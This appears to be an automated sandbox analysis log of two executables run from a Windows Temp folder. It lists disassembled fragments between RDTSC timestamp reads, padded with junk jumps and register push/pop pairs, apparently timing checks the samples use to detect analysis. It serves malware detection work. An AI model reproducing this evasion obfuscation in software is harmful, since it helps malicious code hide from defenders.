Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0365 second address: 4FA03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4ED4F03Bh 0x00000008 pushfd 0x00000009 jmp 00007F0D75558560h 0x0000000e sbb eax, 61A16288h 0x00000014 jmp 00007F0D7555855Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F0DE74E67EEh 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 mov ecx, 4F362AF7h 0x0000002b popad 0x0000002c mov edx, dword ptr [esi+44h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F0D7555855Fh 0x00000038 sbb cx, 077Eh 0x0000003d jmp 00007F0D75558569h 0x00000042 popfd 0x00000043 jmp 00007F0D75558560h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA03E8 second address: 4FA0414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569E1h 0x00000009 sbb ch, 00000066h 0x0000000c jmp 00007F0D755569E1h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0414 second address: 4FA0433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D75558563h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0433 second address: 4FA0465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0D755569DDh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0465 second address: 4FA046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA046B second address: 4FA04BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0DE74E4BEBh 0x0000000e jmp 00007F0D755569DFh 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b popad 0x0000001c jne 00007F0DE74E4BE6h 0x00000022 jmp 00007F0D755569DAh 0x00000027 test bl, 00000007h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0D755569E7h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908C1 second address: 4F908C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908C7 second address: 4F908F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d movsx ebx, ax 0x00000010 pop ecx 0x00000011 mov dl, D2h 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908F3 second address: 4F908F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908F7 second address: 4F9090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9090A second address: 4F9093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F0D75558560h 0x0000000c add esi, 32756E58h 0x00000012 jmp 00007F0D7555855Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9093D second address: 4F90941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90941 second address: 4F9095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9095C second address: 4F909DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 61598CDAh 0x00000008 pushfd 0x00000009 jmp 00007F0D755569DBh 0x0000000e adc cl, 0000007Eh 0x00000011 jmp 00007F0D755569E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F0D755569E1h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0D755569E3h 0x0000002a sbb ch, 0000003Eh 0x0000002d jmp 00007F0D755569E9h 0x00000032 popfd 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F909DA second address: 4F90A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov edi, 5AD05D4Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 call 00007F0D7555855Eh 0x00000015 mov bx, ax 0x00000018 pop esi 0x00000019 pushfd 0x0000001a jmp 00007F0D75558567h 0x0000001f adc ch, FFFFFFAEh 0x00000022 jmp 00007F0D75558569h 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esp], esi 0x0000002c jmp 00007F0D7555855Eh 0x00000031 mov esi, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90A4C second address: 4F90A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90A69 second address: 4F90AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558567h 0x00000008 call 00007F0D75558568h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebx, 00000000h 0x00000016 jmp 00007F0D7555855Eh 0x0000001b test esi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90AB9 second address: 4F90AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 0E499ADEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90AC3 second address: 4F90AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558564h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0DE74EDE09h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90AE7 second address: 4F90B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ax, B5A1h 0x00000016 pushfd 0x00000017 jmp 00007F0D755569DEh 0x0000001c xor ah, 00000038h 0x0000001f jmp 00007F0D755569DBh 0x00000024 popfd 0x00000025 popad 0x00000026 mov di, cx 0x00000029 popad 0x0000002a mov ecx, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90B31 second address: 4F90B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0D7555855Dh 0x0000000a sbb ecx, 4C556BD6h 0x00000010 jmp 00007F0D75558561h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90B5C second address: 4F90B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90B6C second address: 4F90BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7555855Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0DE74EDD7Ch 0x00000011 jmp 00007F0D75558566h 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d pushad 0x0000001e call 00007F0D7555855Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90BB1 second address: 4F90C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jne 00007F0DE74EC1D5h 0x0000000c pushad 0x0000000d jmp 00007F0D755569E8h 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 jmp 00007F0D755569DDh 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F0D755569DCh 0x00000026 sbb cx, 3848h 0x0000002b jmp 00007F0D755569DBh 0x00000030 popfd 0x00000031 mov eax, 581553BFh 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C17 second address: 4F90C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C1B second address: 4F90C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C1F second address: 4F90C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C25 second address: 4F90CBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F0D755569DBh 0x0000000b or eax, 7CD0CB3Eh 0x00000011 jmp 00007F0D755569E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F0D755569DCh 0x00000022 add si, 2838h 0x00000027 jmp 00007F0D755569DBh 0x0000002c popfd 0x0000002d pushfd 0x0000002e jmp 00007F0D755569E8h 0x00000033 sbb cl, FFFFFF98h 0x00000036 jmp 00007F0D755569DBh 0x0000003b popfd 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0D755569E5h 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90CBA second address: 4F90CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90CCA second address: 4F90D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0D755569E3h 0x00000012 or esi, 3F69D56Eh 0x00000018 jmp 00007F0D755569E9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F0D755569E0h 0x00000024 sbb ax, 78E8h 0x00000029 jmp 00007F0D755569DBh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90D2D second address: 4F90D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90D33 second address: 4F90D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0A2B second address: 4FA0A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558569h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F0D75558567h 0x00000010 mov cx, 175Fh 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F0D75558562h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0A81 second address: 4FA0A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0A85 second address: 4FA0A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 502069D second address: 50206A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50206A3 second address: 50206A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50206A7 second address: 50206AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82A9F9 second address: 82A9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 82ADC9 second address: 82ADCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010675 second address: 501067B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501067B second address: 501067F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501067F second address: 5010695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D7555855Bh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010695 second address: 501069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501069B second address: 501069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 501069F second address: 50106A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50106A3 second address: 50106B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov al, 39h 0x0000000c mov bx, BDDCh 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50106B9 second address: 50106D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dh, 85h 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D755569E1h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0278 second address: 4FB0282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 0413528Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0282 second address: 4FB0291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0291 second address: 4FB02BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558569h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D7555855Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB02BF second address: 4FB02C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB02C5 second address: 4FB02C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB02C9 second address: 4FB02E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D755569E4h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50109EE second address: 50109F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50109F2 second address: 50109F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 50109F8 second address: 5010A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010A07 second address: 5010A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D755569DDh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010A36 second address: 5010A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010A3C second address: 5010AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0D755569E6h 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov si, di 0x0000001b pushfd 0x0000001c jmp 00007F0D755569E9h 0x00000021 xor ah, FFFFFFF6h 0x00000024 jmp 00007F0D755569E1h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010AA6 second address: 5010ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov di, 667Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+08h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop edx 0x00000014 mov di, ax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010ABE second address: 5010AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010AC4 second address: 5010AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010AC8 second address: 5010ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push DC8A490Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010ADB second address: 5010ADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010ADF second address: 5010AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B60 second address: 5010B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B66 second address: 5010B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B6C second address: 5010B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B70 second address: 5010B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b movzx eax, al 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0D755569DDh 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 5010B99 second address: 5010BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bh, 07h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: 978065 second address: 97807B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569E2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF82CE second address: AF82D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF72CC second address: AF72F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F0D755569DEh 0x0000000b jmp 00007F0D755569E2h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF72F7 second address: AF72FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF72FB second address: AF730B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F0D755569D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF730B second address: AF7311 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
